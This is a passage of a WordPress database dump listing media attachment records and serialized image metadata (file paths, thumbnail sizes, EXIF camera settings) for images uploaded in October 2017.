pg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"wrappz-coaster-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(534,237,'_wp_attached_file','2017/10/wrappz-delivery.png'),(535,237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1182;s:6:\"height\";i:246;s:4:\"file\";s:27:\"2017/10/wrappz-delivery.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"wrappz-delivery-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"wrappz-delivery-300x62.png\";s:5:\"width\";i:300;s:6:\"height\";i:62;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"wrappz-delivery-768x160.png\";s:5:\"width\";i:768;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"wrappz-delivery-1024x213.png\";s:5:\"width\";i:1024;s:6:\"height\";i:213;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"wrappz-delivery-1170x244.png\";s:5:\"width\";i:1170;s:6:\"height\";i:244;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(536,238,'_wp_attached_file','2017/10/wrappz-keyring.jpg'),(537,238,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:688;s:6:\"height\";i:688;s:4:\"file\";s:26:\"2017/10/wrappz-keyring.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"wrappz-keyring-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"wrappz-keyring-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(538,239,'_wp_attached_file','2017/10/wrappz-laptop.jpg'),(539,239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/wrappz-laptop.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wrappz-laptop-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wrappz-laptop-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wrappz-laptop-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(540,240,'_wp_attached_file','2017/10/wrappz-logo.png'),(541,240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:281;s:6:\"height\";i:56;s:4:\"file\";s:23:\"2017/10/wrappz-logo.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"wrappz-logo-150x56.png\";s:5:\"width\";i:150;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(542,241,'_wp_attached_file','2017/10/Wrappz-love-cushion.png'),(543,241,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:460;s:6:\"height\";i:450;s:4:\"file\";s:31:\"2017/10/Wrappz-love-cushion.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Wrappz-love-cushion-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Wrappz-love-cushion-300x293.png\";s:5:\"width\";i:300;s:6:\"height\";i:293;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(544,242,'_wp_attached_file','2017/10/wrappz-mug.jpg'),(545,242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:688;s:6:\"height\";i:688;s:4:\"file\";s:22:\"2017/10/wrappz-mug.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"wrappz-mug-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"wrappz-mug-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(546,243,'_wp_attached_file','2017/10/Wrappz-wedding.png'),(547,243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:666;s:6:\"height\";i:612;s:4:\"file\";s:26:\"2017/10/Wrappz-wedding.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Wrappz-wedding-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Wrappz-wedding-300x276.png\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(548,244,'_wp_attached_file','2017/10/wrappz-logo-1.png'),(549,244,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:281;s:6:\"height\";i:56;s:4:\"file\";s:25:\"2017/10/wrappz-logo-1.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"wrappz-logo-1-150x56.png\";s:5:\"width\";i:150;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(550,245,'_wp_attached_file','2017/10/wraps.jpg'),(551,245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2017/10/wraps.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"wraps-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"wraps-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"wraps-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(552,246,'_wp_attached_file','2017/10/writing-and-laptop.jpg'),(553,246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:567;s:4:\"file\";s:30:\"2017/10/writing-and-laptop.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"writing-and-laptop-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"writing-and-laptop-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"writing-and-laptop-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(554,247,'_wp_attached_file','2017/10/writing-contract.jpg'),(555,247,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:28:\"2017/10/writing-contract.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"writing-contract-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"writing-contract-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"writing-contract-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(556,248,'_wp_attached_file','2017/10/writing-note.jpg'),(557,248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:567;s:4:\"file\";s:24:\"2017/10/writing-note.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"writing-note-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"writing-note-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"writing-note-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(558,249,'_wp_attached_file','2017/10/writing-on-paper.jpg'),(559,249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:28:\"2017/10/writing-on-paper.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"writing-on-paper-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"writing-on-paper-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"writing-on-paper-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"DSC-HX300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"16.71\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(560,250,'_wp_attached_file','2017/10/writing-paper.jpg'),(561,250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:25:\"2017/10/writing-paper.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"writing-paper-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"writing-paper-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"writing-paper-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(562,251,'_wp_attached_file','2017/10/writing.jpg'),(563,251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:567;s:4:\"file\";s:19:\"2017/10/writing.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"writing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"writing-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"writing-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(564,252,'_wp_attached_file','2017/10/written-blog.jpg'),(565,252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2017/10/written-blog.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"written-blog-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"written-blog-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"written-blog-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(566,253,'_wp_attached_file','2017/10/written-document.jpg'),(567,253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:28:\"2017/10/written-document.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"written-document-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"written-document-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"written-document-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(568,254,'_wp_attached_file','2017/10/written-paper.jpg'),(569,254,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/written-paper.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"written-paper-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"written-paper-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"written-paper-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 500D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.04\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(570,255,'_wp_attached_file','2017/10/xbox-repair.png'),(571,255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:323;s:6:\"height\";i:96;s:4:\"file\";s:23:\"2017/10/xbox-repair.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"xbox-repair-150x96.png\";s:5:\"width\";i:150;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"xbox-repair-300x89.png\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(572,256,'_wp_attached_file','2017/10/xray-dentist.jpg'),(573,256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:642;s:4:\"file\";s:24:\"2017/10/xray-dentist.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"xray-dentist-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"xray-dentist-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"xray-dentist-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(574,257,'_wp_attached_file','2017/10/yamaha.jpg'),(575,257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:642;s:4:\"file\";s:18:\"2017/10/yamaha.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"yamaha-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"yamaha-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"yamaha-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(576,258,'_wp_attached_file','2017/10/yammer.png'),(577,258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:621;s:6:\"height\";i:150;s:4:\"file\";s:18:\"2017/10/yammer.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"yammer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"yammer-300x72.png\";s:5:\"width\";i:300;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(578,259,'_wp_attached_file','2017/10/yellow-festival.jpg'),(579,259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"2017/10/yellow-festival.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"yellow-festival-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"yellow-festival-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"yellow-festival-